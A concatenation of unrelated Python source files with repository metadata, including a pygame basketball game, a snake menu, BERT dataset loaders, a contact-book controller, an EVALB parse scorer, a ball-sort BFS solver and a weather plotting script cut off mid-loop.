    hoop_x = 260
    hoop_y = 360
    hitbox_x = 280
    hitbox_y = 380
    clock = pygame.time.Clock()
    SCORE = 0  # player score
    start_game()
    if not game_start:
        print("\nYou Didn't Press Space :( ")
    else:
        print("\nGame starting....")
    while game_start and is_time_left():
        TIME_LEFT = TIME_ALLOWED - int((pygame.time.get_ticks() - start_time) / 1000)
        clock.tick(30)  # cap the loop at 30 FPS
        for event in pygame.event.get():
            if event.type == pygame.QUIT:
                game_start = False
        keys = pygame.key.get_pressed()
        # if press left(A): move the basket to the left
        if keys[pygame.K_a]:
            hoop_x -= 40
            hitbox_x -= 40
        # if press right(D): move the basket to the right
        # NOTE(review): right moves by 30 while left moves by 40 -- confirm
        # this asymmetry is intended
        if keys[pygame.K_d]:
            hoop_x += 30
            hitbox_x += 30
        # if press escape(ESC): quit game
        if keys[pygame.K_ESCAPE]:
            print("Exiting Game......")
            game_start = False
        # if press reset(R): restart the timer at 60s and clear the score
        if keys[pygame.K_r]:
            start_time = pygame.time.get_ticks()
            SCORE = 0
        win.fill((0, 0, 0))
        # basket/hoop
        win.blit(HOOP, (hoop_x, hoop_y))
        # Loop the same (4) balls with a new speed and position each time they
        # come back; a ball is recycled after it scores or falls off screen.
        for i in range(4):
            if game_balls[i].is_off_screen():
                new_ball(i)
            game_balls[i].draw_ball(win)
            game_balls[i].update_position()
            # hitbox is simplified to be a 120x20 rectangle starting from the
            # top left corner of the rim; a ball falling within this region is
            # considered a score
            if (hitbox_y) < game_balls[i].y < (hitbox_y + 20) and (hitbox_x) < \
                game_balls[i].x < (hoop_x + 120):
                SCORE += 1
                new_ball(i)
        # prints time on screen
        time_tracker = GAME_FONT.render(F"Time:{TIME_LEFT}", True, ORANGE)
        win.blit(time_tracker, (455, 0))
        # prints score on screen
        score_tracker = GAME_FONT.render(F"Score:{SCORE}", True, ORANGE)
        win.blit(score_tracker, (0, 0))
        pygame.display.update()
    # End Game Loop: show the end screen until the player exits or restarts
    close_window = False
    while not close_window:
        for event in pygame.event.get():
            if event.type == pygame.QUIT:
                pygame.quit()
                exit()
            elif event.type == pygame.KEYDOWN:
                if event.key == pygame.K_ESCAPE:
                    close_window = True
                if event.key == pygame.K_r:
                    win.fill(BLACK)
                    # restart by recursing into a fresh game
                    main()
        win.fill(BLACK)
        game_over = GAME_FONT.render("Game Over!", True, ORANGE)
        win.blit(game_over, (215, 50))
        final_score = GAME_FONT.render(F"Final Score: {SCORE} ", True, WHITE)
        win.blit(final_score, (185, 130))
        new_game = GAME_FONT.render("Press R to Start New Game", True, ORANGE)
        win.blit(new_game, (50, 210))
        exit_game = GAME_FONT.render("Press ESC to Close Game", True, ORANGE)
        win.blit(exit_game, (70, 290))
        pygame.display.update()
    # gg
    pygame.quit()
if __name__ == "__main__":
main() | BaboyaChoch/Shot-Clock | main.py | main.py | py | 6,568 | python | en | code | 3 | github-code | 1 | [
{
"api_name": "pygame.init",
"line_number": 4,
"usage_type": "call"
},
{
"api_name": "pygame.display.set_mode",
"line_number": 9,
"usage_type": "call"
},
{
"api_name": "pygame.display",
"line_number": 9,
"usage_type": "attribute"
},
{
"api_name": "pygame.display.s... |
18279946367 | #SNAKE MENU
import pygame
import time
# ANSI escape sequences: move the cursor to the top-left / reset colors
ANSI_HOME_CURSOR = u"\u001B[0;0H\u001B[2"
RESET_COLOR = u"\u001B[0m\u001B[2D"
def snake_print(position):
    """Draw the ASCII snake shifted *position* columns from the left edge."""
    snake = [" ____", " / . .\ ", " \ ---<", " _________________/ /", " \__________________/"]
    print(ANSI_HOME_CURSOR)
    print(RESET_COLOR)
    indent = " " * position
    for row in snake:
        print("\033[1;33;93m" + indent + row)
    print(RESET_COLOR)
def snake():
    """Animate the snake sliding across the screen, one frame per 0.3s."""
    for position in range(0, 50, 2):
        snake_print(position)
        time.sleep(0.3)
#main menu
def main():
    """Show the menu, read the player's choice and launch the selected mode."""
    snake()
    print(" ")
    print("SNAKE REMAKE!")
    print(" ")
    print("1: Tutorial")
    print("2: Play")
    print("0: Exit")
    try:
        answer = int(input("SELECT A NUMBER: "))
        if answer >= 4:
            print("INVALID NUMBER:", answer)
            return
        while answer < 4:
            if answer == 1:
                print("Tutorial: Control the snake using your arrow keys. Eat the fruit, and avoid moving off the screen or bumping into yourself. Get the as many fruits as you can!")
                answer = int(input("SELECT A NUMBER TO CONTINUE: "))
            elif answer == 2:
                print(" ")
                print("E: Easy")
                print("M: Medium")
                print("H: Hard")
                leveltype = input("SELECT A LEVEL: ")
                setlevel(leveltype)
                return
            elif answer == 0:
                return
            else:
                # BUG FIX: this message was missing its f-prefix and printed
                # the literal text "{answer}" instead of the number
                print(f"INVALID NUMBER: {answer}")
                return
    except ValueError:
        print("NOT A NUMBER")
def easy():
    # importing the module runs the easy-mode game as a side effect
    import easy
    pygame.init()
def medium():
    # importing the module runs the medium-mode game as a side effect
    import medium
    pygame.init()
def hard():
    # importing the module runs the hard-mode game as a side effect
    import hard
    pygame.init()
def setlevel(leveltype):
    """Launch the game mode matching *leveltype* ('E', 'M' or 'H').

    Anything else is reported as invalid input.
    """
    if leveltype == "E":
        print("Welcome to Easy Mode!")
        easy()
        return
    if leveltype == "M":
        print("Welcome to Medium Mode!")
        medium()
        return
    if leveltype == "H":
        print("Welcome to Hard Mode!")
        hard()
        return
    print("INVALID INPUT:", leveltype)
main() | fruitycoders/snake | snake/main.py | main.py | py | 1,957 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "time.sleep",
"line_number": 25,
"usage_type": "call"
},
{
"api_name": "pygame.init",
"line_number": 65,
"usage_type": "call"
},
{
"api_name": "pygame.init",
"line_number": 68,
"usage_type": "call"
},
{
"api_name": "pygame.init",
"line_number": 7... |
11976253992 | from matplotlib import pyplot as plt
import torch
from torch.utils.data import Dataset as torchDataset
import pandas as pd
from transformers import BertTokenizer, BertModel
import Config
# module-level BERT tokenizer/encoder shared by both dataset classes;
# loading fetches pretrained weights and moves the model to Config.device
tokenizer = BertTokenizer.from_pretrained('bert-base-uncased')
model = BertModel.from_pretrained('bert-base-uncased').to(Config.device)
class CsvDataset(torchDataset):
    """Dataset over a raw CSV of (label, text) rows, BERT-embedded on access."""

    def __init__(self, csv_path, read_columns=True, sp=','):
        # csv_path may be None to build an empty shell (used by Split/Merge)
        super(CsvDataset, self).__init__()
        self.dataTell = []
        if csv_path == None:
            return
        print("[npc report]read data...", end='')
        self.raw_lines = open(csv_path, "r", encoding="utf8").read().split('\n')
        print("done.")

    def __splitLine__(line, sp=','):
        # split `line` on `sp` while respecting double-quoted fields;
        # NOTE: defined without @staticmethod and always called as
        # CsvDataset.__splitLine__(line), which works in Python 3
        exist_quotation = False
        ll = len(line)
        lst = 0
        res = []
        for i in range(1, ll):
            if line[i] == sp and not exist_quotation:
                res.append(line[lst:i])
                lst = i + 1
            elif line[i] == '"':
                exist_quotation = not exist_quotation
        res.append(line[lst:])
        return res

    def __getitem__(self, idx: int):
        # returns (BERT embedding, one-hot label tensor); on any failure the
        # sentinel (-1, -1) is returned and later dropped by collate_func
        try:
            label, txt = CsvDataset.__splitLine__(self.raw_lines[idx])
            tl = 1 if label == "True" else 0
            inputs = tokenizer(txt, padding='max_length', return_tensors='pt', truncation=True).to(Config.device)
            with torch.no_grad():
                embedding = model(**inputs).last_hidden_state
            return embedding, torch.Tensor([[tl, 1 - tl]]).to(Config.device)
        except Exception as e:
            print("[npc report] Unhandle Eorr:", e, "auto handle:", "skip")
            return -1, -1

    def __len__(self) -> int:
        return len(self.raw_lines)

    def collate_func(self, batch_dic):
        # custom DataLoader collate: drop (-1, -1) sentinel pairs and stack
        # the remaining embeddings/labels along a new batch dimension
        xs, ys = [], []
        for x, y in batch_dic:
            if type(x) == type(-1):
                continue
            xs.append(x.unsqueeze(0))
            ys.append(y)
        return torch.cat(xs, dim=0), torch.cat(ys, dim=0)

    def Split(self, testPor=0.3):
        # split into train/test, drawing equally from the first and second
        # halves of the file
        # NOTE(review): this assumes each half holds one label group -- confirm
        # against the data layout
        train, test = CsvDataset(None), CsvDataset(None)
        half = int(len(self) * 0.5)  # 1000
        spl = int(half * (1 - testPor))  # 700
        train.raw_lines = self.raw_lines[:spl] + self.raw_lines[half:half + spl]
        test.raw_lines = self.raw_lines[spl:half] + self.raw_lines[-(half - spl):]
        return train, test

    def Merge(dtls: list):
        # concatenate several CsvDataset instances into one (call on the class)
        res = CsvDataset(None)
        res.raw_lines = []
        for dt in dtls:
            res.raw_lines += dt.raw_lines
        return res
class PdCsvDataset(torchDataset):
    """Dataset over an Amazon-reviews CSV (read via pandas), BERT-embedded."""

    def __init__(self, csv_path=None):
        super(PdCsvDataset, self).__init__()
        self.dataidx = []   # kept row indices, filled by statistics()
        self.labels = []    # boolean labels aligned with dataidx
        if csv_path != None:
            self.csv = pd.read_csv(csv_path, sep=',')
            self.statistics()

    def collate_func(self, batch_dic):
        # custom DataLoader collate: stack fixed-size embeddings and labels
        xs, ys = [], []
        for x, y in batch_dic:
            xs.append(x.unsqueeze(0).unsqueeze(0))
            ys.append(y.unsqueeze(0))
        return torch.cat(xs, dim=0), torch.cat(ys, dim=0)

    def statistics(self, read_num=1000, cls="reviews.doRecommend"):
        # scan the label column, keeping at most read_num rows per class and
        # skipping non-boolean labels and overly long tokenized reviews
        # NOTE: the loop variable deliberately shadows the `cls` parameter
        # NOTE(review): the first occurrence of each class appends to labels
        # but not dataidx, so the two lists can diverge in length -- verify
        tabu = {}
        for idx, cls in enumerate(self.csv[cls]):
            if type(cls) != type(True):
                continue
            print(self.csv.iloc[idx]["reviews.text"])
            inputs = tokenizer(self.csv.iloc[idx]["reviews.text"], return_tensors='pt')
            if len(inputs) > 47:
                continue
            if cls in tabu.keys():
                if tabu[cls] <= read_num:
                    self.dataidx.append(idx)
                    self.labels.append(cls)
                tabu[cls] += 1
            else:
                tabu.setdefault(cls, 1)
                self.labels.append(cls)
        self.clses = list(tabu.keys())
        self.tabu = tabu
        print("[npc report] PdCsvDataset stat :", tabu)

    def __getitem__(self, index: int):
        # embed the review text with BERT and zero-pad/trim to 46 tokens
        idx = self.dataidx[index]
        tl = 1 if self.labels[index] else 0
        inputs = tokenizer(self.csv.iloc[idx]["reviews.text"], return_tensors='pt')
        with torch.no_grad():
            embedding = model(**inputs).last_hidden_state
        c, h, w = embedding.shape
        if h < 46:
            embedding = torch.cat([embedding, torch.zeros(1, 46 - h, w)], dim=1)
        return embedding[0, :46, :], torch.Tensor([tl, 1 - tl])

    def __len__(self) -> int:
        return len(self.dataidx)

    def Split(self, testPor=0.3):
        # same half-based train/test split strategy as CsvDataset.Split;
        # both splits share the underlying DataFrame
        train, test = PdCsvDataset(None), PdCsvDataset(None)
        half = int(len(self) * 0.5)  # 1000
        spl = int(half * (1 - testPor))  # 700
        train.labels = self.labels[:spl] + self.labels[half:half + spl]
        train.dataidx = self.dataidx[:spl] + self.dataidx[half:half + spl]
        train.csv = self.csv
        test.labels = self.labels[spl:half] + self.labels[-(half - spl):]
        test.dataidx = self.dataidx[spl:half] + self.dataidx[-(half - spl):]
        test.csv = self.csv
        return train, test
if __name__ == "__main__":
    # quick sanity check: load the dataset and plot per-item embedding sizes
    count = 0
    pcsv = PdCsvDataset("../dataset.csv")
    print(len(pcsv))
    # txt,cls = pcsv[0]
    # inputs = tokenizer("It is the time you have wasted for your rose that makes your rose so important.", return_tensors='pt')
    # with torch.no_grad():
    #     all_encoder_layers = model(**inputs)
    #     print(all_encoder_layers.last_hidden_state)
    plty1 = []
    plty2 = []
    x = []
    count = 0
    for txt, cls in pcsv:
        x.append(count)
        count += 1
        plty1.append(txt.shape[1])
        plty2.append(txt.shape[2])
    print(sum(plty1) / len(plty1), sum(plty2) / len(plty2))
    plt.plot(x, plty1, color='red')
    plt.plot(x, plty2, color='green')
    plt.show()
{
"api_name": "transformers.BertTokenizer.from_pretrained",
"line_number": 8,
"usage_type": "call"
},
{
"api_name": "transformers.BertTokenizer",
"line_number": 8,
"usage_type": "name"
},
{
"api_name": "transformers.BertModel.from_pretrained",
"line_number": 9,
"usage_typ... |
5232873316 | from django.core.mail import EmailMessage
# (value, human-readable label) choice pairs for Django model/form fields
TITLE = [
    ('Mr', 'Mr'),
    ('Mrs', 'Mrs'),
    ('Ms', 'Ms'),
    ('Dr', 'Dr'),
]
EXPERTISE = [
    ('UI/UX Design', 'UI/UX Design'),
    ('Product Design', 'Product Design'),
    ('AI Design', 'AI Design'),
]
MENTORSHIP_AREAS = [
    ('Career Advice', 'Career Advice'),
    ('Portfolio Review', 'Portfolio Review'),
    ('Interview Techniques', 'Interview Techniques'),
]
# account kinds
USER_TYPE = [('mentor', 'mentor'), ('member', 'member')]
# mentor-application workflow states
MENTOR_STATUS = [('n/a', 'not applicable'), ('pending', 'pending'),
                 ('approved', 'approved'), ('denied', 'denied')]
class Util:
    """Small helpers shared by the authentication app."""

    @staticmethod
    def send_email(data):
        """Send an email described by *data*.

        Expects the keys 'email_subject', 'email_body' and 'to_email'.
        """
        message = EmailMessage(
            subject=data['email_subject'],
            body=data['email_body'],
            to=(data['to_email'],),
        )
        message.send()
| bbrighttaer/adplisttest | authentication/utils.py | utils.py | py | 840 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "django.core.mail.EmailMessage",
"line_number": 32,
"usage_type": "call"
}
] |
41489962994 | import os
import shutil
import subprocess
import tempfile
from typing import List
from phrasetree.tree import Tree
from elit.metrics.f1 import F1
from elit.metrics.metric import Metric
from elit.utils.io_util import get_resource, run_cmd
from elit.utils.log_util import cprint
class EvalbBracketingScorer(Metric):
    """
    This class uses the external EVALB software for computing a broad range of metrics
    on parse trees. Here, we use it to compute the Precision, Recall and F1 metrics.
    You can download the source for EVALB from here: <https://nlp.cs.nyu.edu/evalb/>.

    Note that this software is 20 years old. In order to compile it on modern hardware,
    you may need to remove an `include <malloc.h>` statement in `evalb.c` before it
    will compile.

    AllenNLP contains the EVALB software, but you will need to compile it yourself
    before using it because the binary it generates is system dependent. To build it,
    run `make` inside the `allennlp/tools/EVALB` directory.

    Note that this metric reads and writes from disk quite a bit. You probably don't
    want to include it in your training loop; instead, you should calculate this on
    a validation set only.

    # Parameters

    evalb_directory_path : `str`, required.
        The directory containing the EVALB executable.
    evalb_param_filename : `str`, optional (default = `"COLLINS.prm"`)
        The relative name of the EVALB configuration file used when scoring the trees.
        By default, this uses the nk.prm configuration file which comes with LAL-Parser.
        This configuration ignores POS tags, S1 labels and some punctuation labels.
    evalb_num_errors_to_kill : `int`, optional (default = `"10"`)
        The number of errors to tolerate from EVALB before terminating evaluation.
    """

    def __init__(
        self,
        evalb_directory_path: str = None,
        evalb_param_filename: str = "nk.prm",
        evalb_num_errors_to_kill: int = 10,
    ) -> None:
        # default to the EVALB copy bundled with LAL-Parser
        if not evalb_directory_path:
            evalb_directory_path = get_resource('https://github.com/KhalilMrini/LAL-Parser/archive/master.zip#EVALB/')
        self._evalb_directory_path = evalb_directory_path
        self._evalb_program_path = os.path.join(evalb_directory_path, "evalb")
        self._evalb_param_path = os.path.join(evalb_directory_path, evalb_param_filename)
        self._evalb_num_errors_to_kill = evalb_num_errors_to_kill
        # header row of EVALB's per-sentence output table, used to skip it
        # when parsing the results below
        self._header_line = [
            "ID",
            "Len.",
            "Stat.",
            "Recal",
            "Prec.",
            "Bracket",
            "gold",
            "test",
            "Bracket",
            "Words",
            "Tags",
            "Accracy",
        ]
        # running bracket counts accumulated across calls
        self._correct_predicted_brackets = 0.0
        self._gold_brackets = 0.0
        self._predicted_brackets = 0.0

    def __call__(self, predicted_trees: List[Tree], gold_trees: List[Tree]) -> None:  # type: ignore
        """
        # Parameters

        predicted_trees : `List[Tree]`
            A list of predicted NLTK Trees to compute score for.
        gold_trees : `List[Tree]`
            A list of gold NLTK Trees to use as a reference.
        """
        # lazily compile EVALB on first use if the binary is missing
        if not os.path.exists(self._evalb_program_path):
            cprint(f"EVALB not found at {self._evalb_program_path}. Attempting to compile it.")
            EvalbBracketingScorer.compile_evalb(self._evalb_directory_path)
            # If EVALB executable still doesn't exist, raise an error.
            if not os.path.exists(self._evalb_program_path):
                compile_command = (
                    f"python -c 'from allennlp.training.metrics import EvalbBracketingScorer; "
                    f'EvalbBracketingScorer.compile_evalb("{self._evalb_directory_path}")\''
                )
                raise RuntimeError(
                    f"EVALB still not found at {self._evalb_program_path}. "
                    "You must compile the EVALB scorer before using it."
                    " Run 'make' in the '{}' directory or run: {}".format(
                        self._evalb_program_path, compile_command
                    )
                )
        # write one tree per line so EVALB can align gold and predicted trees
        tempdir = tempfile.mkdtemp()
        gold_path = os.path.join(tempdir, "gold.txt")
        predicted_path = os.path.join(tempdir, "predicted.txt")
        with open(gold_path, "w") as gold_file:
            for tree in gold_trees:
                gold_file.write(f"{tree.pformat(margin=1000000)}\n")
        with open(predicted_path, "w") as predicted_file:
            for tree in predicted_trees:
                predicted_file.write(f"{tree.pformat(margin=1000000)}\n")
        command = [
            self._evalb_program_path,
            "-p",
            self._evalb_param_path,
            "-e",
            str(self._evalb_num_errors_to_kill),
            gold_path,
            predicted_path,
        ]
        completed_process = run_cmd(' '.join(command))
        # parse EVALB's stdout: 12-column numeric rows hold per-tree counts
        _correct_predicted_brackets = 0.0
        _gold_brackets = 0.0
        _predicted_brackets = 0.0
        for line in completed_process.split("\n"):
            stripped = line.strip().split()
            if len(stripped) == 12 and stripped != self._header_line:
                # This line contains results for a single tree.
                numeric_line = [float(x) for x in stripped]
                _correct_predicted_brackets += numeric_line[5]
                _gold_brackets += numeric_line[6]
                _predicted_brackets += numeric_line[7]
        shutil.rmtree(tempdir)
        self._correct_predicted_brackets += _correct_predicted_brackets
        self._gold_brackets += _gold_brackets
        self._predicted_brackets += _predicted_brackets

    def get_metric(self):
        """
        # Returns

        The accumulated precision, recall and f1 as an F1 object.
        """
        return F1(self._predicted_brackets, self._gold_brackets, self._correct_predicted_brackets)

    def reset(self):
        # clear the accumulated bracket counts
        self._correct_predicted_brackets = 0.0
        self._gold_brackets = 0.0
        self._predicted_brackets = 0.0

    @staticmethod
    def compile_evalb(evalb_directory_path: str = None):
        # build the evalb binary in place and make it executable
        os.system("cd {} && make && cd ../../../".format(evalb_directory_path))
        run_cmd('chmod +x ' + os.path.join(evalb_directory_path, "evalb"))

    @staticmethod
    def clean_evalb(evalb_directory_path: str = None):
        # remove the compiled evalb binary
        return run_cmd("rm {}".format(os.path.join(evalb_directory_path, "evalb")))

    @property
    def score(self):
        # convenience accessor: the F1 component of the current metric
        return self.get_metric().prf[-1]

    def __repr__(self) -> str:
        return str(self.get_metric())
def main():
    """Smoke-test the scorer on identical, partially-wrong and batched trees."""
    # identical trees -> perfect P/R/F1
    tree1 = Tree.fromstring("(S (NP (D the) (N dog)) (VP (V chased) (NP (D the) (N cat))))")
    tree2 = Tree.fromstring("(S (NP (D the) (N dog)) (VP (V chased) (NP (D the) (N cat))))")
    evalb_scorer = EvalbBracketingScorer()
    evalb_scorer([tree1], [tree2])
    metrics = evalb_scorer.get_metric()
    assert metrics.prf == (1.0, 1.0, 1.0)
    # one mislabeled bracket -> 0.75 across the board
    tree1 = Tree.fromstring("(S (VP (D the) (NP dog)) (VP (V chased) (NP (D the) (N cat))))")
    tree2 = Tree.fromstring("(S (NP (D the) (N dog)) (VP (V chased) (NP (D the) (N cat))))")
    evalb_scorer = EvalbBracketingScorer()
    evalb_scorer([tree1], [tree2])
    metrics = evalb_scorer.get_metric()
    assert metrics.prf == (0.75, 0.75, 0.75)
    # batch of one wrong and one right tree -> averaged counts
    tree1 = Tree.fromstring("(S (VP (D the) (NP dog)) (VP (V chased) (NP (D the) (N cat))))")
    tree2 = Tree.fromstring("(S (NP (D the) (N dog)) (VP (V chased) (NP (D the) (N cat))))")
    evalb_scorer = EvalbBracketingScorer()
    evalb_scorer([tree1, tree2], [tree2, tree2])
    metrics = evalb_scorer.get_metric()
    assert metrics.prf == (0.875, 0.875, 0.875)
if __name__ == '__main__':
main()
| emorynlp/seq2seq-corenlp | elit/metrics/parsing/evalb_bracketing_scorer.py | evalb_bracketing_scorer.py | py | 7,748 | python | en | code | 13 | github-code | 1 | [
{
"api_name": "elit.metrics.metric.Metric",
"line_number": 15,
"usage_type": "name"
},
{
"api_name": "elit.utils.io_util.get_resource",
"line_number": 52,
"usage_type": "call"
},
{
"api_name": "os.path.join",
"line_number": 54,
"usage_type": "call"
},
{
"api_name"... |
70861870115 | """A modified BFS algorithm for the Android Bubble Sort Puzzle Solver."""
from collections import deque
from solver.trie import Trie
from solver.state import is_solved_state
from solver.state import count_finished_tubes
from solver.state import get_next_states
class QuantizedDoubleEndedPriorityQueue:
    """Priority queue bucketed by integer rank; pops FIFO from the best bucket."""

    def __init__(self):
        """Create an empty queue."""
        self.d = {}      # rank -> deque of (state, moves) entries
        self.count = 0   # total number of queued entries

    def add(self, rank, state, moves):
        """Queue *state* (with its move list) under *rank*."""
        bucket = self.d.get(rank)
        if bucket is None:
            bucket = deque()
            self.d[rank] = bucket
        bucket.append((state, moves))
        self.count += 1

    def get(self):
        """Dequeue and return the oldest entry from the highest-ranked bucket."""
        best = max(self.d)
        entry = self.d[best].popleft()
        if not self.d[best]:
            del self.d[best]
        self.count -= 1
        return entry
def bfs(initial_state):
    """Run the modified BFS, returning a winning move list (or None)."""
    frontier = QuantizedDoubleEndedPriorityQueue()
    frontier.add(count_finished_tubes(initial_state), initial_state, [])
    visited = Trie()
    while frontier.count > 0:
        state, moves = frontier.get()
        if visited.contains(state):
            continue
        if is_solved_state(state):
            return moves
        visited.add(state)
        for successor, successor_moves in get_next_states(state, moves):
            if visited.contains(successor):
                continue
            frontier.add(count_finished_tubes(successor), successor, successor_moves)
| batzilo/android-ball-sort-puzzle-solver | solver/bfs.py | bfs.py | py | 1,880 | python | en | code | 1 | github-code | 1 | [
{
"api_name": "collections.deque",
"line_number": 22,
"usage_type": "call"
},
{
"api_name": "solver.state.count_finished_tubes",
"line_number": 43,
"usage_type": "call"
},
{
"api_name": "solver.trie.Trie",
"line_number": 46,
"usage_type": "call"
},
{
"api_name": "... |
18088940221 | from model import db_connection
from helper import id_generator,paginated_results
from flask import Flask, request
class Contacts:
    """Controller exposing CRUD operations on a user's contact book."""

    def __init__(self):
        self.db = db_connection.Database()

    def record_exists(self, field, data):
        """Return True when a `contacts` document exists with field == data."""
        count = self.db.get_doc_count("contacts", field, data)
        if count:
            return True
        return False

    def generate_id(self):
        """Return a random contact id not yet present in `contacts`."""
        id = id_generator.ran_gen()
        while True:
            if self.record_exists("contact_id", id):
                id = id_generator.ran_gen()
            else:
                return id

    def create_contact(self, input):
        """Create a new contact and attach it to the requesting user.

        input must contain 'name', 'email' and 'user'.
        Returns {"status": "success"|"error", "message": str}.
        """
        output = {"status": "", "message": ""}
        try:
            name = input['name']
            email = input['email']
            user = input['user']
            if self.record_exists("email", email):
                output["status"] = "error"
                output["message"] = "Email Exists"
            else:
                data_to_insert = {}
                data_to_insert['contact_id'] = self.generate_id()
                data_to_insert['name'] = name
                data_to_insert['email'] = email
                self.db.insert_one_data("contacts", data_to_insert)
                self.db.insert_one_to_array("users", "user", user, "contacts", data_to_insert['contact_id'])
                output["status"] = "success"
        except Exception:
            # BUG FIX: the failure path previously reported "success"; also
            # narrowed the bare except so system exits can propagate
            output["status"] = "error"
        return output

    def remove_contact(self, input):
        """Detach input['contact_id'] from the user's contact list."""
        output = {"status": "", "message": ""}
        try:
            user = input['user']
            contact_id = input['contact_id']
            self.db.delete_one_from_array("users", "user", user, "contacts", contact_id)
            output["status"] = "success"
        except Exception:
            output["status"] = "error"
        return output

    def list_contact(self, input):
        """Return the user's contacts, paginated via ?page= and ?limit=."""
        output = {"status": "", "message": ""}
        try:
            try:
                page = int(request.args.get("page"))
            except (TypeError, ValueError):
                page = 1  # default to the first page
            try:
                limit = int(request.args.get("limit"))
            except (TypeError, ValueError):
                limit = 10  # default page size
            user = input['user']
            query = {"user": user}
            contact_ids = self.db.get_values("users", query, ["contacts"], ["_id"])[0]['contacts']
            query = {"contact_id": {"$in": contact_ids}}
            contacts = self.db.get_values("contacts", query, ["contact_id", "name", "email"], ["_id"])
            output["results"] = paginated_results.paginated_results(contacts, page, limit)
            output["status"] = "success"
        except Exception:
            output["status"] = "error"
        return output

    def search_contact(self, input):
        """Run a text search over the contacts collection."""
        output = {"status": "", "message": ""}
        try:
            search_string = input['search_string']
            output["results"] = self.db.search("contacts", search_string)
            output["status"] = "success"
        except Exception:
            output["status"] = "error"
        return output

    def update_contact(self, input):
        """Update the fields named in input['fields_to_update'] on a contact."""
        output = {"status": "", "message": ""}
        try:
            fields_to_update = input['fields_to_update']
            contact_id = input['contact_id']
            new_fields = {}
            for field in fields_to_update:
                new_fields[field] = input[field]
            self.db.update_one("contacts", "contact_id", contact_id, new_fields)
            output["status"] = "success"
        except Exception:
            output["status"] = "error"
        return output

    def add_contacts(self, input):
        """Attach several existing contact ids to the user's contact list."""
        output = {"status": "", "message": ""}
        try:
            contact_ids = input['contact_ids']
            user = input['user']
            self.db.insert_many_to_array("users", "user", user, "contacts", contact_ids)
            output["status"] = "success"
        except Exception:
            output["status"] = "error"
        return output
| rahulkaliyath/contact-book-server | controllers/contacts.py | contacts.py | py | 4,014 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "model.db_connection.Database",
"line_number": 8,
"usage_type": "call"
},
{
"api_name": "model.db_connection",
"line_number": 8,
"usage_type": "name"
},
{
"api_name": "helper.id_generator.ran_gen",
"line_number": 17,
"usage_type": "call"
},
{
"api_na... |
73502727075 | # --------------------------------
# Name: plot_sbcape_loop.py
# Author: Robert M. Frost
# NOAA Global Systems Laboratory
# Created: 26 June 2023
# Purpose: Loop to plot 2m dew point
# and wind barb comparisons at
# different times during forecast runs
# --------------------------------
from UFSutils import read_grib
import matplotlib.pyplot as plt
from matplotlib import rc
import cartopy.crs as ccrs
import cartopy.feature as cpf
import seaborn
import numpy as np
import geopandas as gpd
# --------------------------------
# settings
# date being plotted
date = "2023041912"  # YYYYMMDDHH
# hour forecast was initialized (UTC)
init = 12
# directory where hrrr grib data are located
dgrib_h = f"/scratch2/BMC/fv3lam/Robby.Frost/expt_dirs/{date}_3km_hrrrphys/{date}/postprd/"
# directory where rap grib data are located
dgrib_r = f"/scratch2/BMC/fv3lam/Robby.Frost/expt_dirs/{date}_3km_rapphys/{date}/postprd/"
# natlev or prslev
nat_prs = "natlev"
# grib message number for 2m dew point
mn_td2m = 1358
# grib message number for u at 10m
mn_u10 = 1364
# grib message number for v at 10m
mn_v10 = 1365
# directory for figure to be output
figdir = f"/scratch2/BMC/fv3lam/Robby.Frost/figures/{date}/td2m/"
# --------------------------------
# plotting setup
rc('font',weight='normal',size=12.5)
# rc('text',usetex='True')
rc('figure',facecolor='white')
# --------------------------------
# NWS dew point colorbar
import matplotlib.colors as colors
# bin edges (deg F) for the dew point colormap
a = np.array([0,10,20,30,40,45,50,55,60,65,70,75,80])
# Normalize the bin between 0 and 1 (uneven bins are important here)
norm = [(float(i)-min(a))/(max(a)-min(a)) for i in a]
# Color tuple for every bin (RGB, 0-255)
# NOTE(review): C holds 14 colors but `a`/`norm` have 13 entries, so the last
# color is never used by the loop below -- confirm this is intended
C = np.array([[59,34,4],
              [84,48,5],
              [140,82,10],
              [191,129,45],
              [204,168,84],
              [223,194,125],
              [230,217,181],
              [211,235,231],
              [169,219,211],
              [114,184,173],
              [49,140,133],
              [1,102,95],
              [0,60,48],
              [0,41,33]])
# Create a tuple for every color indicating the normalized position on the colormap and the assigned color.
COLORS = []
for i, n in enumerate(norm):
    COLORS.append((n, np.array(C[i])/255.))
# Create the colormap
cmap = colors.LinearSegmentedColormap.from_list("dewpoint", COLORS)
# --------------------------------
# loop over forecast hours: for each hour, read 2 m dew point and 10 m wind
# from both runs, make a side-by-side panel plot, then a difference plot.
for hr in range(0,37):
    print(f"Hour {hr}")
    # read in dew point (read_grib returns the full message list plus the field)
    hrrr, td2m_h, lat, lon, valid_date = read_grib(init, hr, dgrib_h, nat_prs, mn_td2m, ret_type=0)
    rap, td2m_r, lat, lon, valid_date = read_grib(init, hr, dgrib_r, nat_prs, mn_td2m, ret_type=0)
    # convert K to fahrenheit (superior unit of temperature)
    td2m_h = (td2m_h.values - 273.15) * (9/5) + 32
    td2m_r = (td2m_r.values - 273.15) * (9/5) + 32
    # read in 10m wind components by message number
    u10_h = hrrr[mn_u10].values
    v10_h = hrrr[mn_v10].values
    u10_r = rap[mn_u10].values
    v10_r = rap[mn_v10].values
    # convert 10m wind from m/s to knots
    u10_h = u10_h * 1.944
    v10_h = v10_h * 1.944
    u10_r = u10_r * 1.944
    v10_r = v10_r * 1.944
    # --------------------------------
    # Plot dew point comparison (two panels: HRRR physics vs RAP physics)
    print(f"Creating 1 x 2 Td2m Plot")
    # Define your custom colorbar bounds
    cbar_min = 0
    cbar_max = 80.1
    # contour levels for dew point fill, every 2 F
    clevs = np.arange(cbar_min, cbar_max, 2)
    # create plot
    fig, ax = plt.subplots(ncols=2, subplot_kw={'projection': ccrs.PlateCarree()},
                           figsize=(16,10), constrained_layout=True)
    # plot HRRR
    c0 = ax[0].contourf(lon, lat, td2m_h, clevs,
                        transform=ccrs.PlateCarree(),
                        cmap=cmap, extend="both")
    # plot RAP
    c1 = ax[1].contourf(lon, lat, td2m_r, clevs,
                        transform=ccrs.PlateCarree(),
                        cmap=cmap, extend="both")
    # mapping
    plt_area = [-101, -94, 30, 37.5] # W, E, S, N
    for i, iax in enumerate(ax):
        iax.coastlines()
        iax.add_feature(cpf.BORDERS)
        iax.add_feature(cpf.STATES)
        iax.set_extent(plt_area)
        # Load the json file with county coordinates
        # NOTE(review): this fetches the geojson over HTTP for every panel of
        # every hour (74+ downloads per script run) — hoist outside the loops.
